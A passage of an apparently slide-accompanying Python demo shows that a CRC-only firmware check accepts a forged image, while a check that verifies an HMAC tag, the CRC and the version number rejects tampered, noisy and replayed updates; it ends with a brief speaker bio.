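    _version, crc = HEADER.unpack_from(image)
    return zlib.crc32(image[HEADER.size:]) == crc

def make_tag(key, image):
    """HMAC-SHA256 over header and payload (stand-in for a vendor signature)."""
    return hmac.new(key, image, hashlib.sha256).digest()

def accept_update(key, image, tag, installed_version):
    """Hardened acceptance: authenticate first, then integrity, then no downgrade."""
    if not hmac.compare_digest(make_tag(key, image), tag):
        return "rejected: bad authentication tag"
    if not crc_ok(image):
        return "rejected: bad CRC"
    version, _crc = HEADER.unpack_from(image)
    if version <= installed_version:
        return "rejected: not newer than installed version"
    return "accepted"

def demo():
    key = b"constructed-demo-key"                    # constructed value
    genuine = build_image(2, b"vendor firmware v2")  # constructed payload
    tag = make_tag(key, genuine)
    # A different payload with a recomputed CRC and bumped version (slide 54, step 3).
    modified = build_image(3, b"someone else's firmware")
    # One flipped bit, as radio noise might cause.
    noisy = genuine[:-1] + bytes([genuine[-1] ^ 0x01])
    return {
        "crc_only_modified": crc_ok(modified),
        "crc_only_noisy": crc_ok(noisy),
        "genuine": accept_update(key, genuine, tag, installed_version=1),
        "modified": accept_update(key, modified, tag, installed_version=1),
        "replayed": accept_update(key, genuine, tag, installed_version=2),
    }

if __name__ == "__main__":
    for name, result in demo().items():
        print(name, "->", result)
```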

Editor's Notes

  1. Web development Academic researcher Haxin’ all the things Founder & Principal Engineer (Web Sight)